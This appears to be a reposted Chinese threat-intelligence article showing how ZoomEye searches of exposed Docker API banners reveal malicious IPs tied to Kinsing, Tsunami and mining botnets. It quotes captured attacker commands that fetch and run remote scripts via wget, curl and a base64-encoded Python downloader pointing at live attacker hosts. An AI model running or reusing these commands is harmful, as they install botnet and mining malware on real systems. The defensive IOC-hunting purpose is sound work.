這篇文章給大家介紹ZoomEye中怎么獲取IOC，內容非常詳細，感興趣的小伙伴們可以參考借鑒，希望對大家能有所幫助。

創新互聯建站網站建設公司是一家服務多年做網站建設策劃設計制作的公司,為廣大用戶提供了成都網站設計、成都網站制作，成都網站設計，廣告投放平臺，成都做網站選創新互聯建站，貼合企業需求，高性價比，滿足客戶不同層次的需求一站式服務歡迎致電。

最近日常使用ZoomEye搜索一些惡意IOC IP信息時，發現一個現在還在活躍的惡意IP：194.38.20.199 直接在ZoomEye里查詢：194.38.20.199 -ip:194.38.20.199解釋下：前面那IP當字符串全局匹配，后面的-ip:194.38.20.199的目的是排除掉本身這個IP開的端口服務的一些信息，結果如下圖：得到129條結果，其中主要是redis及docker服務：這些都是這個團伙作案遺留下來的痕跡被ZoomEye捕獲，從redis記錄可以看出來是通過設置 master_host 的方式進行攻擊的（參考 https://paper.seebug.org/975/ ），而docker服務通過docker api獲取容器信息來看是設置了鏡像Command命令實現命令執行：

/bin/bash -c 'apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 194.38.20.199/d.sh | sh;tail -f /dev/null'"

訪問確定目前這個IP幾服務還是存活狀態！很多事情僵尸網絡等的自動化攻擊都會遺留下很多的攻擊痕跡，而這些痕跡可以被網絡空間搜索引擎探測捕捉到，比如 https://paper.seebug.org/595/ 再比如  前不久360netlab抓到的一個新的Matryosh僵尸網絡通過攻擊adb服務進行傳播，國外的研究者就發現通過ZoomEye可以捕捉到有意思信息 https://twitter.com/r3dbU7z/status/1356802656493264896我們回到這個主題案例，在這些被入侵的docker api服務里我們可以通過ZoomEye搜索 wget 或 curl 或 apt-get這些痕跡來確定被入侵目標及其他黑客團伙或IOC信息，我們以wget為例子 搜索語法如下：

"Server: Docker" +"Content-Type: application/json" +wget

到目前搜索到71 條結果（注意這個結果可能隨時變化這個是因為ZoomEye采用覆蓋更新的方式，比如被入侵后恢復正常服務就會被替換）搜索其他團伙或者IOC語法如下：

"Server: Docker" +"Content-Type: application/json" +wget -194.38.20.199

排除包含有194.38.20.199的目標，得到19條結果。隨便找一個：

"Command":"sh -c 'wget -qO - http://34.66.229.152:80/wp-content/themes/twentyseventeen/d | sh; tail -f /dev/null'"

找到一個新的34.66.229.152[目前也處于存活狀態] 開源威脅情報顯示這個是Tsunami的DDOS團伙，我們繼續語法：

"Server: Docker" +"Content-Type: application/json" +wget -194.38.20.199 -34.66.229.152

得到2條目標，看下banner里的Command信息得到2個惡意IP 45.137.155.55[目前也處于存活狀態] 及 209.141.40.190[目前也處于存活狀態]

"Command":"/bin/bash -c 'apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 45.137.155.55/d.sh | sh;tail -f /dev/null'"

從這個命令格式及d.sh的來看跟 194.38.20.199的很類似，姑且可以歸于Kinsing。

"Command":"chroot /mnt /bin/sh -c 'curl -s http://209.141.40.190/xms | bash -sh; wget -q -O - http://209.141.40.190/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDkuMTQxLjQwLjE5MC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -; lwp-download http://209.141.40.190/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms'"

看起來又是一個挖礦相關的，所以到目前為止我們通過在Docker API信息里搜索wget最終找到了如下幾個惡意IOC：194.38.20.199/45.137.155.55 Kinsing/挖礦34.66.229.152  Tsunami/DDOS209.141.40.190 未知/挖礦當然你還可以通過分析哪些sh腳本提取跟多的IOC IP地址進行關聯，這里與主題關系不大就不繼續了。

關于ZoomEye中怎么獲取IOC就分享到這里了，希望以上內容可以對大家有一定的幫助，可以學到更多知識。如果覺得文章不錯，可以把它分享出去讓更多的人看到。

當前題目：ZoomEye中怎么獲取IOC
本文URL：http://m.jcarcd.cn/article/pejisi.html